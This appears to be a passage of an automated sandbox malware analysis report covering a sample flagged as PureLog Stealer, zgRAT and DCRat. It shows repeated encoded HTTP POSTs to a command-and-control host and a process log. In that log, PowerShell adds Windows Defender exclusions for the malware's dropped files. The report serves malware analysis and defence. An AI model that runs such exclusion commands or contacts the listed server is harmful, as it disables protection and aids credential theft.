                                                                                  Data Ascii: QQX[TKPYY_[RZ]YUUWTPQ\[Z^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.[(2541>"-=/T2Y&\':^653-V+' 5[5\?&X"#\.
                                                                                  Jan 1, 2025 11:29:08.317962885 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:08.446157932 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:29:04 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 02 1a 24 00 28 36 2f 1f 25 2b 26 09 30 58 23 12 3f 0d 0c 11 2c 05 39 5a 26 3a 05 03 28 20 2f 18 3f 3b 29 04 3f 03 06 58 25 1c 30 57 25 0f 2a 51 00 1c 23 1e 28 38 28 06 2a 2b 2a 1c 29 08 2b 5f 28 02 34 02 36 29 27 1c 24 5d 35 0f 30 3d 27 11 28 59 2c 55 2f 36 28 07 2c 0d 2f 13 26 36 2f 52 09 14 21 12 29 55 34 0d 32 22 3e 5a 27 20 05 5d 22 3b 33 54 23 22 35 1f 23 0a 3b 5b 3f 3d 11 5f 21 31 00 59 26 2f 3d 18 3e 2e 2b 50 35 3e 23 54 2c 03 23 56 0f 36 5d 51
                                                                                  Data Ascii: $(6/%+&0X#?,9Z&:( /?;)?X%0W%*Q#(8(*+*)+_(46)'$]50='(Y,U/6(,/&6/R!)U42">Z' ]";3T#"5#;[?=_!1Y&/=>.+P5>#T,#V6]Q


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  144192.168.2.450147185.158.202.5280
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:29:07.802774906 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:29:08.159236908 CET1044OUTData Raw: 51 55 58 5e 54 44 50 5a 59 5f 5b 52 5a 5f 59 53 55 53 54 58 51 58 5b 5a 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QUX^TDPZY_[RZ_YSUSTXQX[Z^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.\("=4 X%.&:=7$,.',965)3<=S*$^"><:&X"#\.<
                                                                                  Jan 1, 2025 11:29:08.448710918 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:08.583746910 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:29:05 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  145192.168.2.450148185.158.202.5280
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:29:08.705621958 CET302OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:29:09.049830914 CET1044OUTData Raw: 51 52 5d 58 54 43 55 58 59 5f 5b 52 5a 5b 59 53 55 5f 54 5e 51 58 5b 58 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QR]XTCUXY_[RZ[YSU_T^QX[X^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.Z("-W7>+&"D:=#1&39!&1'=W*'8""+&X"#\.,
                                                                                  Jan 1, 2025 11:29:09.343269110 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:09.470130920 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:29:05 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  146192.168.2.450149185.158.202.5280
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:29:09.598582029 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:29:09.956010103 CET1040OUTData Raw: 54 5b 58 5c 54 41 50 5c 59 5f 5b 52 5a 5a 59 5c 55 5f 54 5a 51 50 5b 5f 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: T[X\TAP\Y_[RZZY\U_TZQP[_^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.Z+*#X2=6B.-$&<"\'&#5U%<2*';]!)+:&X"#\.
                                                                                  Jan 1, 2025 11:29:10.235394001 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:10.362190008 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:29:06 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  147192.168.2.450150185.158.202.5280
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:29:10.487360954 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:29:10.849827051 CET1044OUTData Raw: 54 55 58 58 54 45 50 5a 59 5f 5b 52 5a 5f 59 52 55 56 54 59 51 50 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TUXXTEPZY_[RZ_YRUVTYQP[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-("5V#-&6D:=/U&:'&Y!:'/&>4]6.&)*&X"#\.<
                                                                                  Jan 1, 2025 11:29:11.128770113 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:11.258151054 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:29:07 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  148192.168.2.450151185.158.202.5280
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:29:11.379162073 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:29:11.737207890 CET1044OUTData Raw: 54 5b 58 58 54 47 50 5d 59 5f 5b 52 5a 52 59 57 55 51 54 5b 51 5e 5b 59 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: T[XXTGP]Y_[RZRYWUQT[Q^[Y^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.<2& .#&>5:#%/*3:X!=3Y)P=B#_!><:&X"#\.
                                                                                  Jan 1, 2025 11:29:12.024661064 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:12.155803919 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:29:08 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  149192.168.2.450152185.158.202.5280
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:29:12.282274961 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:29:12.627857924 CET1044OUTData Raw: 51 57 5d 52 54 4b 55 59 59 5f 5b 52 5a 58 59 54 55 52 54 58 51 58 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QW]RTKUYY_[RZXYTURTXQX[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-(1= -<%.6:[+S1/%$Z*X!1T3Q)43_":<*&X"#\.
                                                                                  Jan 1, 2025 11:29:12.928555012 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:13.060053110 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:29:09 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:05:26:57
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Users\user\Desktop\QH67JSdZWl.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Users\user\Desktop\QH67JSdZWl.exe"
                                                                                  Imagebase:0x7ff7b8ef0000
                                                                                  File size:1'898'695 bytes
                                                                                  MD5 hash:C8228B107DFAD48C1A7DE8147FA1F6E4
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1663870017.0000025FF5CAA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:1
                                                                                  Start time:05:26:57
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe"
                                                                                  Imagebase:0x720000
                                                                                  File size:3'568'371 bytes
                                                                                  MD5 hash:FEB773E3FB046E0D1F39450C703492CA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000003.1669628043.0000000006EB8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000003.1668966554.00000000065A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 83%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:2
                                                                                  Start time:05:26:58
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\mshypercomponentSavesdll\kNSe5xQ3wI9ft6pWJZ9EeFYPDfgbdbVMsQk13JHxpBJ7xdPC40.vbe"
                                                                                  Imagebase:0xf30000
                                                                                  File size:147'456 bytes
                                                                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:3
                                                                                  Start time:05:26:59
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\mshypercomponentSavesdll\1fgSUpJ8Uk5BF.bat" "
                                                                                  Imagebase:0x240000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:4
                                                                                  Start time:05:26:59
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:5
                                                                                  Start time:05:26:59
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\mshypercomponentSavesdll/agentFont.exe"
                                                                                  Imagebase:0xf30000
                                                                                  File size:3'284'992 bytes
                                                                                  MD5 hash:0D30B2D3FD8DB7AE5EDC0455DA8DC8E9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1771990456.00000000133B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.1686628391.0000000000F32000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\mshypercomponentSavesdll\agentFont.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\mshypercomponentSavesdll\agentFont.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\mshypercomponentSavesdll\agentFont.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\mshypercomponentSavesdll\agentFont.exe, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 83%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:24
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\RuntimeBroker.exe'
                                                                                  Imagebase:0x7ff788560000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:25
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\mshypercomponentSavesdll\DONEBnCAFZiOynZWpVVmZLvNQeA.exe'
                                                                                  Imagebase:0x7ff788560000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:26
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:27
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ApplicationFrameHost.exe'
                                                                                  Imagebase:0x7ff788560000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:28
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:29
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exe'
                                                                                  Imagebase:0x7ff788560000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:30
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:31
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe'
                                                                                  Imagebase:0x7ff788560000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:32
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\mshypercomponentSavesdll\agentFont.exe'
                                                                                  Imagebase:0x7ff788560000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:33
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:34
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:35
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:36
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\z0MvDYgz73.bat"
                                                                                  Imagebase:0x7ff6fa930000
                                                                                  File size:289'792 bytes
                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:37
                                                                                  Start time:05:27:03
                                                                                  Start date:01/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

